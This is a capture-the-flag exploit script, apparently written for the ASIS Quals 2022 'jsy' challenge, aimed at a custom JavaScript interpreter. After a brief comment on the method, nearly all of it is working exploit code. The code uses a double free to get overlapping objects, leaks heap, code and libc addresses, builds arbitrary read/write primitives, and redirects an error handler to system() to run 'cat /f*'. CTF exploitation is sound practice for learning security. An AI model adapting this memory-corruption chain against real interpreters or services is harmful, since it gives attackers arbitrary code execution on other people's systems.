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Created October 16, 2022 03:46
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ASIS Quals 2022 - jsy
Double free an object (a), cause a JsObject (d) to overlap with a non-sparse array (c)
Use this to read addresses as strings, convert back to integers
Use shrstr in JsValue to overwrite array pointer for arbitrary r/w
function hex(x) {
return "0x" + x.toString(16)
function tohex(x) {
var val = ""
for(var i = 0; i < x.length; i++)
val += x.charCodeAt(i).toString(16)
return val
function readhex(str) {
var encoded = encodeURI(str)
var val = ""
var i = 0
while(i < encoded.length) {
if(encoded[i] == "%") {
val += encoded.substring(i+1, i+3)
i += 3
else {
val += tohex(encoded[i])
i += 1
return val
function u64(str) {
var val = readhex(str);
var res = ""
for(var i = val.length - 2; i >= 0; i -= 2) {
res += val.substring(i, i+2)
return parseInt(res, 16)
function p64(int) {
var out = ""
var tmp = int.toString(16)
var val = 0
while(tmp.length < 16) {
tmp = "0" + tmp
for(var i = 14; i >= 4; i -= 2) {
val = parseInt(tmp.substring(i, i+2), 16)
x = val.toString(16)
if(x.length == 1) {
out += "%0" + val.toString(16)
else {
out += "%" + val.toString(16)
out = decodeURI(out)
return out
var a = [13.37]
var b = [13.37]
// c->obj = b
// c->obj.arr = a
var c = [13.37, 13.37, 13.37, 13.37, 13.37]
// d->obj = a
// c->obj.arr = d->obj
var d = [13.37]
// Leaks
var tmp = c[3]
var heap_leak = u64(tmp)
var heap = heap_leak - 0x6230
print("[*] Heap base @ "+hex(heap))
// Arb r/w (addresses without nulls)
function read(addr) {
tmp_str = "aaaaaaaa" + p64(addr)
c[4] = tmp_str.slice(0, 14)
tmp = d[0]
return u64(tmp)
function write(addr, val) {
tmp_str = "aaaaaaaa" + p64(addr)
c[4] = tmp_str.slice(0, 14)
tmp_str_2 = p64(val).slice(0, 6)
d[0] = tmp_str_2
function write_str(addr, str) {
tmp_str = "aaaaaaaa" + p64(addr)
c[4] = tmp_str.slice(0, 14)
tmp_str_2 = str.slice(0, 7)
d[0] = tmp_str_2
// More leaks
var code_leak = read(heap + 0x1538)
var code = code_leak - 0x3aa5d
print("[*] Code base @ "+hex(code))
var exit_got = code + 0x4ee48
var libc_leak = read(exit_got)
var libc = libc_leak - 0x455f0
print("[*] Libc base @ "+hex(libc))
// Overwrite js_defaultreport with system
var system = libc + 0x50d60
var exception = heap + 0x2b8
write(exception, system)
// Overwrite js_State with arg
var arg = "cat /f*"
var js_state = heap + 0x2a0
write_str(js_state, arg)
// system("cat /f*")
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